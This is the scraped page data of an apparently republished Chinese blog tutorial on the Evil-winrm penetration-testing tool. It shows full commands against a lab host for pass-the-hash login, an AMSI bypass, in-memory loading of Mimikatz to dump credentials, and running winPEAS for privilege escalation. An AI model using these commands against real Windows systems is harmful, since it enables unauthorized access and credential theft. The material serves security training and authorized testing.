script:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"7s6g1","text":"","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"5m0qs","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell\nBypass-4MSI\nInvoke-Mimikatz.ps1\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},
{"key":"436s5","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":6}],"data":{}},{"key":"a1ked","text":"Log storage and running executables:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"8h9ls","text":"Evil-winrm also provides log storage, which makes it easy to keep a record of operations during CTF competitions or penetration tests. It can also run exe executables inside the PowerShell session, which is a great convenience for an attacker.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"4ammt","text":"Log storage:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":12,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"dtggg","text":"The -l flag saves all logs to the local machine","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":4,"length":2,"style":"CODE"}],"entityRanges":[],"data":{}},{"key":"5kmbm","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},{"key":"6c403","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":7}],"data":{}},{"key":"567vo","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":8}],"data":{}},{"key":"do05p","text":"Running executables:\n","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":20,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3dsa9","text":"Supply the path to the WinPEAS.exe executable stored on the local machine","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":23,"length":11,"style":"CODE"}],"entityRanges":[],"data":{}},{"key":"8vedf","text":"evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc\nBypass-4MSI\nmenu\nInvoke-Binary /opt/privsc/winPEASx64.exe\n","type":"code-block","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{"syntax":"javascript"}},
{"key":"30ekb","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":9}],"data":{}},{"key":"2pm3b","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":10}],"data":{}},{"key":"4kgpt","text":"Service enumeration and file transfer:","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"b5bt0","text":"Evil-winrm can list all services running on the target system, which helps an attacker identify services that other tools did not detect. It also supports uploading and downloading files, which simplifies file transfer between the target system and the attacker's machine.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"9d5ka","text":"Service enumeration:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":20,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"fqnmv","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":11}],"data":{}},{"key":"8dtfi","text":"File transfer:","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":14,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b5lf0","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":12}],"data":{}},{"key":"fir8u","text":"\ud83d","type":"atomic","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":0,"length":1,"key":13}],"data":{}},{"key":"840du","text":"Summary","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"4cm2l","text":"Evil-winrm is a powerful penetration-testing tool. With multiple login methods, script execution, log storage and other features, it greatly simplifies the penetration-testing process. As network security threats keep evolving, tools such as Evil-winrm play an increasingly important role in the toolboxes of security experts and penetration testers.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{"0":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/ba9e7899724c2581f2d66168687481c4.png","imageAlt":"","name":"","blockWidth":1080,"blockHeight":55
8}},"1":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/782139bb357672ee1d85e120caf3c50a.png","imageAlt":"","name":"","blockWidth":573,"blockHeight":205}},"2":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/261b558d4bb2028ad13ac47927d178d0.png","imageAlt":"","name":"","blockWidth":622,"blockHeight":223}},"3":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/7fc49f928a8e4c7f9a4835937cc5f927.png","imageAlt":"","name":"","blockWidth":628,"blockHeight":269}},"4":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/cb7a6515397d2c688d637854b3872afc.png","imageAlt":"","name":"","blockWidth":635,"blockHeight":188}},"5":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/530dde0b0aab03a08634ba06ec79abba.png","imageAlt":"","name":"","blockWidth":628,"blockHeight":288}},"6":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/fcfa74083d5efbc77190adc1704cc167.png","imageAlt":"","name":"","blockWidth":672,"blockHeight":687}},"7":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/90887e058d889ab20026c22a8154457a.png","imageAlt":"","name":"","blockWidth":661,"blockHeight":366}},"8":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/1a8bf1f749f5242188b038372bba6f73.png","imageAlt":"","name":"","blockWidth":670,"blockHeight":228}},"9":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/ead10960b12a27fa34a92e786c48e70d.png","imageAlt":"","name":"","blockWidth":673,"blockHeight":689}},"10":{"type":"IMAGE","mut
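ability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/c0ead9f3ddd599b1cd45c0ef0d035f25.png","imageAlt":"","name":"","blockWidth":674,"blockHeight":634}},"11":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/b3d5b3731a4e46b9b57aa183833eb7e8.png","imageAlt":"","name":"","blockWidth":670,"blockHeight":459}},"12":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/33e62467913e729617b97daf99c55906.png","imageAlt":"","name":"","blockWidth":634,"blockHeight":322}},"13":{"type":"IMAGE","mutability":"IMMUTABLE","data":{"imageUrl":"https://developer.qcloudimg.com/http-save/yehe-2017757/f50957d563ecdca3f5dcd4ee01eee0c2.png","imageAlt":"","name":"","blockWidth":632,"blockHeight":268}}}},"createTime":1732703166,"ext":{"closeTextLink":0,"comment_ban":0,"description":"","focusRead":0},"favNum":0,"isOriginal":0,"likeNum":0,"pic":"https://developer.qcloudimg.com/http-save/yehe-2017757/6d4e0b72a10e801419c6d7a931e9c1de.jpg",
"plain":"Introduction:\nIn network security, technical progress always goes hand in hand with the contest between attack and defense. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (WinRM) to carry out remote operations.\nEvil-winrm stands out for its versatility and practicality. It supports remote login with a plain-text password, over SSL, with an NTLM hash, with keys and in other ways, and it also offers advanced features such as file transfer and logging. In addition, the tool can load DLL files in memory, bypassing some security software, and dynamically bypass security mechanisms such as AMSI.\nThe tool is already included in Kali Linux, but if you want to download it separately you can get it from its official git repository. Evil-winrm is open-source software and easy to obtain: you can download it directly from the project page on GitHub.\nhttps://github.com/Hackplayers/evil-winrm\nDiscovering and using the WinRM service:\nWinRM is a remote management protocol in the Microsoft Windows operating system. It is based on the WS-Management protocol and allows commands, scripts and management tasks to be run remotely. With nmap we can check whether the target host has the two default WinRM ports, 5985 and 5986, open, using the following command:\nnmap -p 5985,5986 192.168.1.19\n\nOnce we have confirmed that the WinRM service is enabled on the target host, we can use Evil-winrm for remote management.\nMultiple login methods:\nEvil-winrm supports several login methods, including login with a plain-text password, a login session with SSL encryption enabled, and a pass-the-hash attack using an NTLM hash.\nPlain-text password login:\nIf you have already obtained the target host's plain-text password through legitimate enumeration, you can use Evil-winrm to open a remote session. The following example command shows how:\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987\n\nAs you can see, the remote session has been established successfully.\nSSL-encrypted login:\nTo make the remote session more secure, Evil-winrm can encrypt the WinRM connection with SSL. When SSL is enabled, all transmitted data is encrypted, which helps protect the session against man-in-the-middle attacks and other network-level threats.\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S\n\nNTLM hash login:\nA PowerShell session can be established by using evil-winrm to carry out a pass-the-hash (Pass-The-Hash) attack. This attack lets an attacker log in remotely with an NTLM hash instead of a plain-text password. The following is a complete example command for this kind of attack:\nevil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38\n\nRunning PowerShell scripts:\nEvil-winrm also lets the user load PowerShell scripts from the local machine directly into the target machine's memory, and it provides an AMSI bypass feature.\nScript source:\nhttps://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\nThe following commands load and run the Mimikatz script:\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell\nBypass-4MSI\nInvoke-Mimikatz.ps1\n\nLog storage and running executables:\nEvil-winrm also provides log storage, which makes it easy to keep a record of operations during CTF competitions or penetration tests. It can also run exe executables inside the PowerShell session, which is a great convenience for an attacker.\nLog storage:\nThe -l flag saves all logs to the local machine\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l\n\nRunning executables:\n\nSupply the path to the WinPEAS.exe executable stored on the local machine\nevil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc\nBypass-4MSI\nmenu\nInvoke-Binary /opt/privsc/winPEASx64.exe\n\nService enumeration and file transfer:\nEvil-winrm can list all services running on the target system, which helps an attacker identify services that other tools did not detect. It also supports uploading and downloading files, which simplifies file transfer between the target system and the attacker's machine.\nService enumeration:\nFile transfer:\nSummary\nEvil-winrm is a powerful penetration-testing tool. With multiple login methods, script execution, log storage and other features, it greatly simplifies the penetration-testing process. As network security threats keep evolving, tools such as Evil-winrm play an increasingly important role in the toolboxes of security experts and penetration testers.",
"showReadNum":171,"sourceDetail":null,"sourceType":99,"status":2,"summary":"In network security, technical progress always goes hand in hand with the contest between attack and defense. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (WinRM) to carry out remote operations.","tagIds":[16545,17276,17287,17592,10672],"title":"[Tools] Evil-winrm, the Super Management Terminal for Hacker Penetration Testing","uid":2017757,"updateTime":1732703166,"userSummary":"In network security, technical progress always goes hand in hand with the contest between attack and defense. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (WinRM) to carry out remote operations.","userUpdateTime":1732703166,"isNewArticle":false},
"authorInfo":{"articleNum":0,"avatarUrl":"https://developer.qcloudimg.com/http-save/10011/f7e7056991e2e0aebf44c32cfa9b462a.jpg","company":"A financial company","introduce":"","isProfessionVerified":0,"nickname":"释然IT杂谈","privilege":1,"title":"Operations","uid":2017757},"authorType":{"isBlogMoveAuthor":1,"isCoCreator":0,"isInternalAuthor":0,"isOriginalAuthor":1},"classify":[{"id":9,"name":"Security"}],"columnInfo":{"columnAvatar":"https://imgcache.qq.com/qcloud/developer/images/release/column-icons/6.png","columnDesc":"","columnId":86963,"columnName":"释然IT杂谈","createTime":1588960313,"createUid":2017757,"memberNum":1,"showArticleNum":266,"showConcernNum":52},"columnList":[{"columnAvatar":"https://imgcache.qq.com/qcloud/developer/images/release/column-icons/6.png","columnDesc":"","columnId":86963,"columnName":"释然IT杂谈","createTime":1588960313,"createUid":2017757,"memberNum":1,"showArticleNum":266,"showConcernNum":52}],"editTime":0,"isTencent":false,"longtailTags":[],"publishTime":1732703166,"sourceDetail":{"blogType":1,"blogUrl":"","channelSource":"wechat","originalTime":"2024-11-26","sourceAuthor":"释然IT杂谈","sourceLink":"https://mp.weixin.qq.com/s?__biz=MzIxMTEyOTM2Ng==\u0026mid=2247504177\u0026idx=1\u0026sn=e2710e8f9ba0b1f3bae9e72d6ebf8dc9\u0026chksm=97589448a02f1d5e3216383a46f5202ae71fbf3efc1b86369bf34d29b4f618eda861d8c7d8f8#rd","wechatNickName":"释然IT杂谈","wechatUserName":"gh_ad4551519762"},"tags":[{"categoryId":99,"createTime":"2023/03/14 11:34:42","groupId":0,"groupName":"","tagId":16545,"tagName":"tools"},{"categoryId":99,"createTime":"2023/03/14 11:34:55","groupId":0,"groupName":"","tagId":17276,"tagName":"tool"},{"categoryId":99,"createTime":"2023/03/14 11:34:55","groupId":0,"groupName":"","tagId":17287,"tagName":"management"},{"categoryId":99,"createTime":"2023/03/14 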
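11:35:00","groupId":0,"groupName":"","tagId":17592,"tagName":"terminal"},{"categoryId":3,"createTime":"2018/09/06 18:30:02","groupId":10133,"groupName":"Development technology","tagId":10672,"tagName":"hacker"}],
"textLink":[{"ext":{"categoryId":1030,"categoryName":"General technology - Security","desc":"Network security is the comprehensive work of protecting computer networks from threats such as unauthorized access, attack, damage, tampering and theft, and of ensuring the confidentiality, integrity and availability of network systems. It involves computer hardware, software, network devices, data, applications and users, and requires comprehensive security measures.","kpCount":6,"name":"Network security","pCategoryId":1002,"termId":1662},"id":58,"link":"https://cloud.tencent.com/product/ddos","sources":[1,2],"text":"network security"},{"ext":{"categoryId":0,"categoryName":"","desc":"","kpCount":0,"name":"","pCategoryId":0,"termId":0},"id":1109,"link":"https://cloud.tencent.com/product/wpt","sources":[1],"text":"penetration testing"},{"ext":{"categoryId":1026,"categoryName":"General technology - Operating systems","desc":"Kali Linux is an operating system based on Debian Linux for penetration testing and network security assessment. It contains a large number of tools and resources for security testing, vulnerability exploitation and penetration testing. Kali Linux is free open-source software and one of the preferred tools of hackers and security experts. Kali Linux also has a strong community that provides support and updates, keeping the operating system's security and tools up to date.","kpCount":12,"name":"Kali Linux","pCategoryId":1002,"termId":1977},"id":3674,"link":"https://cloud.tencent.com/developer/techpedia/1977","sources":[2],"text":"Kali Linux"},{"ext":{"categoryId":1026,"categoryName":"General technology - Operating systems","desc":"Windows is an operating system developed and maintained by Microsoft. It is an operating system with a graphical user interface that lets users interact with the computer using a mouse and keyboard. Windows provides many features, including file management, network connectivity, multimedia playback and games.","kpCount":11,"name":"Windows","pCategoryId":1002,"termId":1822},"id":3531,"link":"https://cloud.tencent.com/developer/techpedia/1822","sources":[2],"text":"Windows"},{"ext":{"categoryId":1025,"categoryName":"General technology - Operations","desc":"GitHub is a web-based version control and collaboration platform used mainly to store, manage and share open-source code and projects. It provides git-based version control, so that multiple developers can work together in the same code base and easily track changes to the code. GitHub also provides many other features, such as issue tracking, code review, code snippet sharing and automated testing, which let developers develop and collaborate more efficiently.","kpCount":11,"name":"GitHub","pCategoryId":1002,"termId":1872},"id":3579,"link":"https://cloud.tencent.com/developer/techpedia/1872","sources":[2],"text":"GitHub"},{"ext":{"categoryId":1026,"categoryName":"General technology - Operating systems","desc":"Linux is an open-source operating system created by Linus Torvalds in 1991. It is based on the Unix operating system and is highly stable, secure and reliable. Linux can run on a wide range of computer hardware, including personal computers, servers, mobile devices and embedded systems.","kpCount":16,"name":"Linux","pCategoryId":1002,"termId":1821},"id":3530,"link":"https://cloud.tencent.com/developer/techpedia/1821","sources":[2],"text":"Linux"}]},
"#url:\"/api/tag/products\",params:#tagIds:@16545,17276,17287,17592,10672,,objectType:1,objectId:2471795,,":[{"adActivity":{"id":5738,"lightSpotLabel":"HOT","pageUrl":"https://cloud.tencent.com/act/pro/Featured","priority":1,"startTime":"2023/12/12 17:58:46","title":"Featured deals and group-buy offers"},"cnName":"Website Penetration Test","desc":"Website Penetration Test (WPT) fully simulates the attack and vulnerability-discovery techniques a hacker might use, probes the security of the target system in depth and finds its weakest points. The biggest difference between penetration testing and a hacker intrusion is that penetration testing is authorized by the customer and uses controllable, non-destructive methods to find weaknesses in the target and its network devices, helping administrators understand the problems their network faces, and provides hardening advice to help the customer improve system security. Tencent Cloud Website Penetration Test is carried out by security experts from Tencent Security Lab, with black-box, white-box and gray-box test plans to find the customer's potential risks more comprehensively and in greater depth.","docURL":"","hasActivity":false,"icon":"https://main.qcloudimg.com/image/product/2105/24_24/blue.svg","introURL":"https://cloud.tencent.com/product/wpt","name":"wpt","productId":10909,"shortDesc":"Simulates hacker attacks and digs deep into system weak points to prevent problems before they occur","tagId":10914},{"adActivity":{"id":5738,"lightSpotLabel":"HOT","pageUrl":"https://cloud.tencent.com/act/pro/Featured","priority":1,"startTime":"2023/12/12 17:58:46","title":"Featured deals and group-buy offers"},"cnName":"DDoS protection","desc":"DDoS protection (Anti-DDoS) offers comprehensive, efficient and professional DDoS protection and provides organizations with a range of DDoS solutions, such as the DDoS high-defense package and DDoS high-defense IP, to deal with DDoS attacks. With ample, high-quality DDoS protection resources and a continuously evolving scrubbing algorithm that combines in-house development with AI-based recognition, it keeps users' services running stably and securely. Protection scenarios cover gaming, internet, video, finance, government and other industries.","docURL":"https://cloud.tencent.com/document/product/297","hasActivity":false,"icon":"https://main.qcloudimg.com/image/product/2075/32_32/blue.svg","introURL":"https://cloud.tencent.com/product/ddos","name":"ddos","productId":11061,"shortDesc":"A trustworthy DDoS protection system offering a range of security solutions for different industries","tagId":10431}]},
"tdk":{"title":"[Tools] Evil-winrm, the Super Management Terminal for Hacker Penetration Testing - Tencent Cloud Developer Community - Tencent Cloud","keywords":"tools,tool,management,terminal,hacker","description":"In network security, technical progress always goes hand in hand with the contest between attack and defense. Today we take a close look at Evil-winrm, an efficient penetration-testing tool developed by the Hackplayers team and designed to simplify penetration testing in Microsoft Windows environments. Evil-winrm works with the PowerShell Remoting Protocol (PSRP) and uses the Windows Remote Management protocol (..."},"meta":{"subject":"Other-Uncategorized-tools,Other-Uncategorized-tool,Other-Uncategorized-management,Other-Uncategorized-terminal,General technology-Development technology-hacker","subjectTime":"2024-11-27 18:26:06","articleSource":"W","magicSource":"N","authorType":"Z,O","productSlug":"wpt,ddos"},"link":{"canonical":"https://cloud.tencent.com/developer/article/2471795"},"cssName":["Article","DraftMaster","Player"],"rbConfigKeys":["groupQRKeywords"],"directedContent":null,"pvId":"71-MWCFpCVoTQ0mrbAq7T","clientIp":"8.222.208.146","globalAnnounce":{"announceId":35,"content":"Everyone who takes part wins a prize: the Tencent Cloud LLM Knowledge Engine×DeepSeek best-practice essay contest with prizes is now under way! Click for details: \u003ca href=\"https://cloud.tencent.com/developer/article/2496399\" target=\"_blank\"\u003ehttps://cloud.tencent.com/developer/article/2496399\u003c/a\u003e\u003cbr/\u003e \n \u003cimg src=\"https://qcloudimg.tencent-cloud.cn/raw/e8d8f79b0ec4658f3274a7d56238daf4.jpg\"/\u003e","title":"LLM Knowledge Engine×DeepSeek practice essay contest"},"rbConfig":{"groupQRKeywords":{"AI":{"keywords":[],"img":"https://qcloudimg.tencent-cloud.cn/raw/89b22f53dc3d4e0516d0a4f74ab01a30.png"}},"versionUpdateTipList":[{"id":1005,"title":"Article \u0026 Q\u0026A comments now support emoji","description":"Come and try it out!","start_time":"2025/02/14 00:00:00","end_time":"2025/02/28 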
23:59:59"}],"navList":[],"activity-popup":{"mImgUrl":"https://qccommunity.qcloudimg.com/mp/images/11-11mobile.jpg","imgUrl":"https://qccommunity.qcloudimg.com/mp/images/11-11pc.jpg","beginTime":"2024/10/24 00:00:00","endTime":"2024/10/31 23:59:59"},"header-advertisement":{"imageUrl":"https://qccommunity.qcloudimg.com/image/2024-11-01-18-15.png","link":"https://cloud.tencent.com/act/pro/double11-2024?from=22374\u0026from_column=22374#miaosha"}},"isBot":false,"session":{"isLogined":false,"isQCloudLogined":false,"isQCommunityLogined":false,"isDifferentUin":false}}},"page":"/article/[articleId]","query":{"articleId":"2471795"},"buildId":"9hp3loRhW5K95-TQOzEpv","assetPrefix":"https://qccommunity.qcloudimg.com/community","isFallback":false,"gssp":true,"appGip":true,"scriptLoader":[]}</script></body></html>